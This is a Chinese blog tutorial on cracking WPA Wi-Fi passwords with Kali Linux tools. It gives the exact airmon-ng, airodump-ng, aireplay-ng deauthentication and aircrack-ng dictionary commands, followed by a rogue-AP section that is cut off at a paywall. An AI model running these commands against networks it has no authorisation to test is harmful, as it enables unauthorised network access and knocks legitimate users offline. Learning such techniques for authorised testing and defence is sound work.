Kali渗透测试(四)——无线网络WPA攻击(PSK破解、AIROLIB、JTR、cowpatty、pyrit)

最新推荐文章于 2024-07-30 15:49:13 发布
原创 最新推荐文章于 2024-07-30 15:49:13 发布 · 1.9k 阅读 · 17 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细介绍了WPA无线网络的多种破解方法,包括PSK攻击、AIROLIB、JTR、cowpatty及pyrit等工具的使用流程与实践。从启动monitor到抓取握手包,再到字典暴力破解,深入探讨了WPA的安全性及其破解难点。

无线网络WPA的攻击

主要有PSK攻击和AIROLIB、JTR、cowpatty、pyrit等工具的使用

(一)WPA PSK 攻击
WPA不存在WEP的弱点,只能基于字典暴力破解
在这里插入图片描述PSK破解过程
启动monitor
抓握手包并保存
deauthentication攻击获取4步握手信息
字典暴力破解

2.实践
AP设置为WPA,AES加密

2.1
首先检测专用的USB无线网卡,我用的是RT3070(或者是RTL8187都可以) 就是这里的wlan0
在这里插入图片描述
2.2
停止掉一些不必要的服务:service network-manager stopairmon-ng check kill
然后启动网卡的monitor 模式: airmon-ng start wlan0

在这里插入图片描述

开始网络探测:airodump-ng wlan0mon
在这里插入图片描述
2.3
拿第一个无线实验,抓取握手包

airodump-ng -c 11 --bssid 2C:XX:XX:1D:53:50 -w wpa wlan0mon

#抓包,-c指定信道,–bssid指定侦听的AP,-w写入wpa文件
在这里插入图片描述

发现有一个客户端在线,但是没有握手包,所以 deauthentication攻击让他重连,来尽可能多的抓包,aireplay-ng -0 2 -a 2C:XX:XX:1D:53:50 -c DC:EF:XX:XX:XX:XX wlan0mon
-0指定攻击次数,-a指定AP,-c指定客户端
在这里插入图片描述
#成功抓取握手信息,wpa-01.cap
在这里插入图片描述

2.4
用自带字典暴力破解,得到了密码
aircrack-ng -w /usr/share/john/password.lst wpa-01.cap
字典还有以下这些
#/usr/share/wfuzz/wordlist/fuzzdb/wordlists-misc/
#/usr/share/wfuzz/wordlist/fuzzdb/wordlists-user-passwd/passwds/
#/usr/share/wordlists/rockyou.txt.gz
在这里插入图片描述
这里的密码比较简单能用字典很快跑出来,但是如果密码比较复杂可能跑不出来。

2、无AP情况下的WPA密码破解
启动monitor
抓包并保存
根据probe信息伪造相同ESSID的AP
获取4步握手信息的前两个包
字典暴力破解
实践
窗口1 伪装AP,下面二选一

airbase-ng
最低0.47元/天 解锁文章
kali 简单版攻击WiFi(附详细教程)
Alphamilk的博客
12-08 1万+
由于有关这方面内容的详细介绍实在不少,但是复习起来也比较麻烦,重点和次重点之间可能会混淆,所以写一篇复习起来比较方便的一篇水文>_
kali攻击WiFi教程(仅供学习)
nlj1860453的博客
12-05 3966
2、插入USB无线网卡,再输入“iwconfig”查看是否有无线网卡“wlan0”,如果没有,点击“虚拟机”--“可移动设备”--然后点以“R”开头的按钮--“连接”输入“aireplay-ng --bssid 攻击的WiFi的MAC -c 信道 -0 攻击次数 wlan0mon”开始攻击,WiFi下面所有连接它的人都掉线了。3、输入“airmon-ng start wlan0”开启监听,如果提示“有两个可能报错的进程”那就输入“airmon-ng check kill”杀死进程。
wifi-hacker:使用内置Kali工具攻击无线连接的Shell脚本。 支持所有证券(WEP,WPS,WPAWPA2)
05-11
使用内置Kali工具攻击无线连接的Shell脚本。 支持所有证券(WEP,WPS,WPAWPA2)
kali Linux简单版攻击WiFi(内附教程)
最新发布
2301_77472496的博客
07-30 3834
kali Linux简单版攻击WiFi
kali linux无线攻击工具使用说明,Kali Linux无线攻击工具
weixin_42410566的博客
05-08 2110
ToolsDescriptionAirebase-ngThis tool is used to attack clients as opposed to the Access Point itself. It has the ability to act as an ad-hoc Access Point.Aircrack-ngIt is an 802.11 WEP and WPA-PSK key...
Kali linux 学习笔记(三十)无线渗透——WPA攻击PSK破解AIROLIBJTRcowpattypyrit) 2020.3.13
闵行小鱼塘
03-13 1356
本节学习对WPA攻击,主要有PSK破解AIROLIBJTRcowpattypyrit
kali无线渗透笔记
fhl5203的博客
11-01 1088
无线渗透 iw list 显示无线网卡的详细信息,包括信道频率 iwlist wlan2 frequency 查看wlan2网卡的信道频率 扫描附近的AP •iw dev wlan2 scan | grep SSID •iw dev wlan2 scan | egrep “DS\ Parameter\ set|SSID” •iwlist wlan2 scanning | egrep “ESSID|...
wireless_ultimate技术所得
张同学
03-26 854
-----------无线技术的特点 安全性不高 802.11标准 IEEE 国际电器电子工程师协会 由通信航天生物电器电子等方面的科学家组成 IEEE 分为不同的技术委员会 其中802委员负责LAN MAN(城愈往)标准的制定 802.1 802.2 802.3乙太网 … 802.6 MAN … 802.11 Wireless LAN(WLAN) -------------802.11 标准 802.11 属于数据链路层 802.11a 802.11b 802.11c 802.11d 802.11e 80
kali wifi断网攻击/掉线攻击(转载)
03-26 2740
【代码】kali wifi断网攻击/掉线攻击
Kali linux渗透测试系列————29、Kali linux 渗透攻击无线网络攻击
Fly_鹏程万里
05-16 1606
由于本人没有无线网卡,所以这部分暂时无法提供!之后又空的时候回出一个系列到时候给大家进行详细的介绍。
kali破解wifi密码(wpa_wpa2).html
05-03
kali linux破解简单wifi密码
cowpatty-4.6
08-29
cowpatty for linux,用于破解无线密码的工具
cowpatty-4.3.rar
12-19
coWPAtty 是一款 Linux 下用于破解无线密码的工具。 这个工具被用作暴力破解WPA-PSK,
cowpatty-2.0.0..0.tgz
04-15
安装fiuxion必须的工具包,下载解压后使用,请勿非法使用
cowpatty-4.6.tgz
11-23
工具包好吧 他是在HASH文件下用的东西
kali攻击wifi、破解wifi密码详细教程
热门推荐
jennycisp的博客
02-27 1万+
1.kali虚拟机(我用的2021.1版本)2.无线网卡(3070L或者8187L,网上有卖)3.fluxion(wifi钓鱼工具
kali破解无线WIFI密码
weixin_43134675的博客
09-25 1万+
准备材料: 装有kali Linux系统的电脑一台,如果使用的是虚拟机还需要usb网卡一个。 首先将网卡插上电脑,确保在kali系统里能读出网卡,这里使用iwconfig命令查看网卡状态。如果电脑本身装的系统就是kali的话就能使用电脑自带的网卡(现在的电脑一般都有吧),如果是在虚拟机上使用kali就需要一个usb网卡,一般几十块钱的就ok。至于kali系统的安装直接去百度kali,进入官网下载就...
Kali渗透基础》14. 无线渗透(
学习学习学习......
08-09 2086
Aircrack-ng、JTR、Evil Twin Attacker、Wifipumpkin3、Fern-WiFi-Cracker、Kismet、Reaver、WiFite、MAC 地址绑定攻击、WEP 攻击WPA PSK 攻击WPA 企业攻击、WPS 攻击、无线侦查。
攻击WLAN基础设施
关月的博客
01-08 637
文章目录破解AP的默认账户拒绝服务攻击evil twin和AP MAC地址欺骗攻击无赖AP部署无赖AP 破解AP的默认账户 一些路由的管理web页面账户密码默认:admin,123456等等 即使并非如此一般其登录密码一般也较为简单,通过对网络抓包分析,编码对其进行暴力攻击。 迅捷家用路由器模拟登录页面测试 拒绝服务攻击 aireplay-ng -0 -a ap_mac -c vitim_ma...
Kali渗透测试实战:ARP欺骗与中间人攻击技术详解
Kali渗透测试教程是一套系统性极强的网络安全学习资料,涵盖了从基础环境搭建到高级攻击技术实施的完整流程。本教程以Kali Linux操作系统为核心平台,深入讲解了如何利用其内置的强大工具集进行合法授权范围内的安全...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Bulldozer++

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值